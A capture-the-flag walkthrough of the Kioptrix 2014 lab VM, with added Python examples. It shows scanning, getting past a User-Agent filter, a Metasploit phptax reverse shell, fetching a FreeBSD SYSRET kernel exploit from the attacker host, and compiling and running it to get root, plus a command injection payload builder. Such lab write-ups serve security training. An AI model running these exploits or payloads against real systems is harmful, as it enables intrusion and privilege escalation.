I had some time this week and wanted to work on a vulnerable machine challenge. A while ago I had enjoyed working through the
Kioptrix VMs but had never gotten a chance to work on the one released in 2014. So I decided that would be an excellent exercise for the evening. SPOILER ALERT: The rest of this post will provide a solution to this challenge.
First, it is worth mentioning that I had to remove and re-add the network card in order for the VM to grab an IP address. This is also mentioned on the Kioptrix VM blog.
My Setup:
Kali: 192.168.138.129
Kioptrix 5: 192.168.138.130
So we start with a good old-fashioned nmap scan.
root@kali:~# nmap -sV 192.168.138.130
Starting Nmap 6.46 ( http://nmap.org ) at 2014-09-08 21:57 EDT
Nmap scan report for 192.168.138.130
Host is up (0.00031s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:50:56:3C:ED:6C (VMware)
That looks like a standard web server, so it is time to browse to it and see what we have. Let's start with port 80.

Well, that is rather disappointing! I was hoping for some type of login or input box. Let's check 8080.

That was more interesting, but not very exciting either. Let's move to one of my favorite web scanners, Nikto, and scan both sites.
root@kali ~# nikto -h 192.168.138.130
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.138.130
+ Target Hostname: 192.168.138.130
+ Target Port: 80
+ Start Time: 2014-09-08 22:00:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.4.26)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
root@kali ~# nikto -h 192.168.138.130:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.138.130
+ Target Hostname: 192.168.138.130
+ Target Port: 8080
+ Start Time: 2014-09-08 22:45:47 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ All CGI directories 'found', use '-C none' to test none
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.4.26)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 22376 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2014-09-08 22:49:51 (GMT-4) (244 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
At first glance there appears to be a possibility with CVE-2002-0082 (OSVDB-756), a flashback to Kioptrix 1. After some investigating you will find those exploits do not work here. The hit is a false positive: the mod_ssl bundled with Apache 2.x carries Apache's own version number (2.2.21), and Nikto is comparing that against the old standalone mod_ssl 2.8.x series, so the "outdated" and "2.8.7 and lower" lines are version-string confusion rather than a real finding. Bummer.

As I often do when working through a test like this, I went back and ran the same scans again. They produced the same results, as expected, but this time it caught my attention how long they were taking. Nikto is a fast scanner and this is an isolated network, yet the 8080 scan took 244 seconds for 22376 requests and reported that all CGI directories were "found", which means the server answered every directory probe the same way and Nikto had to test all of them. Why? What if the scan is being filtered? Nikto identifies itself in the User-Agent header, and that field is configurable in nikto.conf, so let's change it. This took some time: I ran the same scan with several different user agents, taken from
useragentstrings.com, until BINGO, something different came back. Check the results below from an IE6 user agent string against 8080 (note the scan now takes 7356 requests and reports 44 items instead of 7):
nikto.conf
....
# User-Agent variables:
# @VERSION - Nikto version
# @TESTID - Test identifier
# @EVASIONS - List of active evasions
#USERAGENT=Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID)
USERAGENT=Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
...
root@kali:~# nikto -h http://192.168.138.130:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.138.130
+ Target Hostname: 192.168.138.130
+ Target Port: 8080
+ Start Time: 2014-09-09 19:02:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-3268: /: Directory indexing found.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.4.26)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /./: Directory indexing found.
+ OSVDB-3268: /?mod=node&nid=some_thing&op=view: Directory indexing found.
+ OSVDB-3268: /?mod=some_thing&op=browse: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ OSVDB-3268: /?Open: Directory indexing found.
+ OSVDB-3268: /?OpenServer: Directory indexing found.
+ OSVDB-3268: /%2e/: Directory indexing found.
+ OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: /?mod=alert(document.cookie)&op=browse: Directory indexing found.
+ OSVDB-3268: /?sql_debug=1: Directory indexing found.
+ OSVDB-3268: ///: Directory indexing found.
+ OSVDB-3268: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: Directory indexing found.
+ OSVDB-3268: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: Directory indexing found.
+ OSVDB-3268: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: Directory indexing found.
+ OSVDB-3268: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: Directory indexing found.
+ OSVDB-3268: /?PageServices: Directory indexing found.
+ OSVDB-119: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.
+ OSVDB-3268: /?wp-cs-dump: Directory indexing found.
+ OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.
+ OSVDB-3268: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ OSVDB-3288: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when /'s are requested.
+ OSVDB-3268: /?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3268: /?D=A: Directory indexing found.
+ OSVDB-3268: /?N=D: Directory indexing found.
+ OSVDB-3268: /?S=A: Directory indexing found.
+ OSVDB-3268: /?M=A: Directory indexing found.
+ OSVDB-3268: /?\">alert('Vulnerable');: Directory indexing found.
+ OSVDB-3268: /?_CONFIG[files][functions_page]=http://cirt.net/rfiinc.txt?: Directory indexing found.
+ OSVDB-3268: /?npage=-1&content_dir=http://cirt.net/rfiinc.txt?&cmd=ls: Directory indexing found.
+ OSVDB-3268: /?npage=1&content_dir=http://cirt.net/rfiinc.txt?&cmd=ls: Directory indexing found.
+ OSVDB-3268: /?show=http://cirt.net/rfiinc.txt??: Directory indexing found.
+ OSVDB-3268: /?-s: Directory indexing found.
+ OSVDB-3268: /?q[]=x: Directory indexing found.
+ 7356 requests: 0 error(s) and 44 item(s) reported on remote host
+ End Time: 2014-09-09 19:04:01 (GMT-4) (113 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
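The User-Agent-dependent behaviour the two 8080 scans exposed can be checked directly instead of by rerunning Nikto and watching the clock: request the same URL with several agent strings and compare status and body. The script below is an added example, not code from the original post. The Nikto and IE6 strings are the ones used above; the Firefox and curl strings, and the small gated test server it probes when run on its own, are assumptions (the box's real httpd.conf is not shown in the post).

```python
"""Differential User-Agent probing: fetch one URL with several agents and
flag the agents that get a different answer. Added example, not code from
the original post. The Nikto and IE6 agent strings are the ones used in the
post; the other agents and the gated test server are assumptions."""
import hashlib
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

AGENTS = {
    "nikto":   "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000000)",
    "ie6":     "Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "firefox": "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0",
    "curl":    "curl/7.38.0",
}


def probe(url, agent, timeout=10):
    """GET url with one User-Agent; return (status, sha1(body), len(body)).
    A 403 or 404 is data too, so HTTPError is captured rather than raised."""
    req = urllib.request.Request(url, headers={"User-Agent": agent})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read()
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read()
    return status, hashlib.sha1(body).hexdigest(), len(body)


def fingerprint(url, agents=AGENTS):
    """Probe url once per agent label."""
    return {label: probe(url, ua) for label, ua in agents.items()}


def group_by_response(results):
    """Map (status, body hash) -> [agent labels] that received that answer."""
    groups = {}
    for label, (status, digest, _length) in results.items():
        groups.setdefault((status, digest), []).append(label)
    return groups


def outliers(results):
    """Agent labels whose answer differs from the most common one.
    An empty list means the server does not care about the User-Agent."""
    groups = group_by_response(results)
    if len(groups) < 2:
        return []
    majority = max(groups.values(), key=len)
    return sorted(label for labels in groups.values()
                  if labels is not majority for label in labels)


class GatedHandler(BaseHTTPRequestHandler):
    """Stand-in for a User-Agent gated vhost (assumption, not the box's real
    config): only Mozilla/4.0-style agents see the directory listing,
    everyone else gets the placeholder page."""
    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        if ua.startswith("Mozilla/4.0"):
            body = b'<html><body><a href="phptax/">phptax/</a></body></html>'
        else:
            body = b"<html><body>It works!</body></html>"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def demo():
    """Run the gated server on an ephemeral loopback port and probe it."""
    srv = HTTPServer(("127.0.0.1", 0), GatedHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        results = fingerprint("http://127.0.0.1:%d/" % srv.server_address[1])
    finally:
        srv.shutdown()
    return results, outliers(results)


if __name__ == "__main__":
    results, odd = demo()
    for label, (status, digest, length) in results.items():
        print("%-8s %d %5d %s" % (label, status, length, digest[:12]))
    print("differs from the majority:", odd)
```

Against a real target, replace the loopback URL in `demo()` with `http://192.168.138.130:8080/` and extend `AGENTS` with whatever strings you pulled from useragentstrings.com; the body hash catches differences that a status code alone would miss, such as a 200 placeholder page versus a 200 directory listing.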
Now we are getting somewhere! There is more to this site than meets the eye. Let's browse to it with the User Agent Switcher add-on for Iceweasel, using the IE6 string.

Interesting: we have a new directory to look at. Clicking on it reveals a web app.

Now, I had never heard of "phptax", so my first instinct was to run it through searchsploit.
root@kali:/var/www# searchsploit phptax
...
phptax 0.8 - Remote Code Execution Vulnerability | /php/webapps/21665.txt
PhpTax pfilez Parameter Exec Remote Code Injection | /php/webapps/21833.rb
PhpTax 0.8 - File Manipulation(newvalue | /php/webapps/25849.txt
Sure enough, there is a remote code execution exploit. Looking at the Ruby file, it is already a Metasploit module, even better. Time to switch over to Metasploit. After a little configuration, BAM, we have a shell!
msf payload(reverse_tcp) > use exploit/multi/http/phptax_exec
msf exploit(phptax_exec) > show options
Module options (exploit/multi/http/phptax_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST 192.168.138.130 yes The target address
RPORT 8080 yes The target port
TARGETURI /phptax/ yes The path to the web application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 PhpTax 0.8
msf exploit(phptax_exec) > exploit
[*] 192.168.138.130:8080 - Sending request...
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Iam34x4WAqVYQ4PL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo jIkHJaahsxxiLarm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Iam34x4WAqVYQ4PL\r\n"
[*] Matching...
[*] A is input...
[*] Reading from socket B
[*] B: "jIkHJaahsxxiLarm\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.138.129:4444 -> 192.168.138.130:57006) at 2014-09-09 21:20:00 -0400
[*] Command shell session 2 opened (192.168.138.129:4444 -> 192.168.138.130:28179) at 2014-09-09 21:20:00 -0400
ls
data
drawimage.php
files
icons.inc
index.php
maps
pictures
readme
ttf
whoami
www
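What the phptax_exec module just abused is plain OS command injection: the pfilez parameter named in the searchsploit results ends up inside a shell command. The following is an added example in Python of that bug class beside its hardened form. It is not phptax's PHP source (the post does not show it); the `ls -l data/` command is a stand-in for whatever the real application ran, and the payload shape is the generic "terminate and append" form of command injection.

```python
"""OS command injection via a request parameter, vulnerable and hardened.
Added example in Python, not phptax's code: the command and the data/ path
are stand-ins, and the payload is the generic ';cmd;' injection shape."""
import re
import shlex
import subprocess


def render_unsafe(pfilez):
    """Vulnerable pattern: string concatenation plus shell=True. The shell
    sees the attacker's ';' and runs whatever follows it."""
    cmd = "ls -l data/" + pfilez
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allow-list: one leading alnum/underscore, then up to 63 safe characters.
# No ';', no space, no '/', no leading '.', so '..' and dotfiles are out too.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def render_safe(pfilez):
    """Hardened form: validate against the allow-list, then hand argv to the
    kernel as a list so no shell ever parses the value."""
    if not SAFE_NAME.fullmatch(pfilez):
        raise ValueError("rejected pfilez value: %r" % (pfilez,))
    return subprocess.run(["ls", "-l", "data/" + pfilez],
                          capture_output=True, text=True).stdout


def injection_payload(command, marker):
    """Close the intended command with ';', run ours with a recognisable
    marker, and end with ';' so any text the application appends becomes a
    separate (failing) command instead of an argument to ours."""
    return "x;%s %s;" % (command, shlex.quote(marker))


def demonstrate():
    """Return (marker leaked through the unsafe path?, safe path refused?)."""
    marker = "INJECTED-4f2a"
    payload = injection_payload("echo", marker)
    leaked = marker in render_unsafe(payload)
    try:
        render_safe(payload)
        refused = False
    except ValueError:
        refused = True
    return leaked, refused


if __name__ == "__main__":
    print("unsafe leaked marker: %s, safe refused payload: %s" % demonstrate())
```

The `echo` marker is the harmless stand-in for the reverse-shell one-liner the Metasploit module sends; the point of the hardened version is that both defences are needed, since an allow-list alone still leaves the shell in the path if a later change loosens the regex, and argv-as-list alone still lets `../` walk the filesystem.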
Now we are on the box as the www user, but not root. Time to do some recon on the box.
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
FreeBSD 9, OK, back to searchsploit. I get a lot of results, but one in particular interested me: 28718.
root@kali ~# searchsploit freebsd 9
....
FreeBSD 9.1 ftpd Remote Denial of Service | /freebsd/dos/24450.txt
FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escl | /freebsd/local/26368.c
FreeBSD 9 Address Space Manipulation Privile | /freebsd/local/26454.rb
FreeBSD 9.0 - Intel SYSRET Kernel Privilege | /freebsd/local/28718.c
FreeBSD <= 7.1 libc Berkley DB Interface Uni | /freebsd/local/32946.c
....
So there is a local privilege escalation: 28718.c is the Intel SYSRET bug (CVE-2012-0217, FreeBSD-SA-12:04.sysret), which affects FreeBSD amd64 kernels running on Intel CPUs. That means we need to get the exploit onto the box and be able to compile it. Poking around some more, I determined that I have gcc and can write to the directory I am currently in. But how do I get the file there? My first thought was a web server, but the box does not seem to have wget or curl. A quick Google search turned up fetch, FreeBSD's built-in equivalent. So I hosted the exploit on Kali's web server and used fetch to pull it down. One caveat worth keeping in mind: this is a kernel exploit, and a failed attempt can panic the machine rather than fail cleanly, so take a VM snapshot before running it.
fetch http://192.168.138.129/28718.c
28718.c 5565 B 31 MBps
ls
28718.c
data
drawimage.php
files
icons.inc
index.php
maps
pictures
readme
testfile
ttf
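Before compiling and running a kernel exploit it is worth a short pre-flight check, since a wrong guess can panic the target instead of just failing. The script below is an added example, not part of the original post. The facts it encodes are that FreeBSD-SA-12:04.sysret (CVE-2012-0217) was published on 2012-06-12 and affects amd64 kernels on Intel CPUs only. The `uname -a` line is the one from the session above; the `hw.model` strings it is fed are constructed, and `have_gcc` and `cwd_writable` stand for the `which gcc` and write-test checks already done by hand.

```python
"""Pre-flight check before running the 28718.c SYSRET exploit. Added
example, not part of the original post. Facts encoded: FreeBSD-SA-12:04
(CVE-2012-0217) was published 2012-06-12 and affects amd64 kernels on
Intel CPUs only. KIOPTRIX_UNAME is the line from the post; the hw.model
strings passed in below are constructed."""
import re
from datetime import datetime

SYSRET_ADVISORY = datetime(2012, 6, 12)

UNAME_RE = re.compile(
    r"^(?P<os>\S+)\s+(?P<host>\S+)\s+(?P<release>\S+)\s+.*?#\d+:\s+"
    r"(?P<built>\w{3}\s+\w{3}\s+\d{1,2}\s+\d\d:\d\d:\d\d\s+\w+\s+\d{4})"
    r"\s+.*\s(?P<arch>\S+)$"
)


def parse_uname(line):
    """Pull OS, release, kernel build timestamp and arch out of `uname -a`."""
    m = UNAME_RE.match(line.strip())
    if not m:
        raise ValueError("unrecognised uname -a output")
    built = " ".join(m["built"].split())   # collapse the padded day field
    return {
        "os": m["os"], "release": m["release"], "arch": m["arch"],
        "built": datetime.strptime(built, "%a %b %d %H:%M:%S %Z %Y"),
    }


def sysret_preflight(uname_line, hw_model, have_gcc=True, cwd_writable=True):
    """Return (go, reasons). Everything is a hard stop except the build date:
    a kernel built before the advisory is certainly unpatched, a later build
    date only suggests a patch, so that one is reported as a warning."""
    info = parse_uname(uname_line)
    stops, warnings = [], []
    if info["os"] != "FreeBSD":
        stops.append("target is %s, not FreeBSD" % info["os"])
    if info["arch"] != "amd64":
        stops.append("SYSRET bug needs an amd64 kernel, got %s" % info["arch"])
    if "Intel" not in hw_model:
        stops.append("CPU is not Intel; AMD is not affected")
    if not have_gcc:
        stops.append("no compiler on the target")
    if not cwd_writable:
        stops.append("current directory is not writable")
    if info["built"] >= SYSRET_ADVISORY:
        warnings.append("kernel built %s, after the advisory; may be patched"
                        % info["built"].date())
    return (not stops), stops + warnings


# uname -a output from the session in the post
KIOPTRIX_UNAME = ("FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: "
                  "Tue Jan 3 07:46:30 UTC 2012 "
                  "root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64")

if __name__ == "__main__":
    # constructed hw.model values (sysctl hw.model on the target)
    for model in ("Intel(R) Core(TM) i7 CPU", "AMD Opteron(tm) Processor"):
        go, why = sysret_preflight(KIOPTRIX_UNAME, model)
        print("%-28s -> %s %s" % (model, "GO" if go else "STOP", why))
```

On the target, `sysctl hw.model` gives the CPU string and `uname -a` the kernel line; for the Kioptrix kernel (built January 2012, amd64) the only thing that can turn this into a STOP is the VM host's CPU vendor, which is exactly the variable a lab walkthrough tends not to mention.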
Now to compile, run, and hope that it works.
gcc 28718.c -o sploit
ls
28718.c
data
drawimage.php
exploit.php
files
icons.inc
index.php
maps
pictures
readme
sploit
testfile
ttf
./sploit
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
whoami
root
WOOT! The exploit worked and now we have root. Mission complete.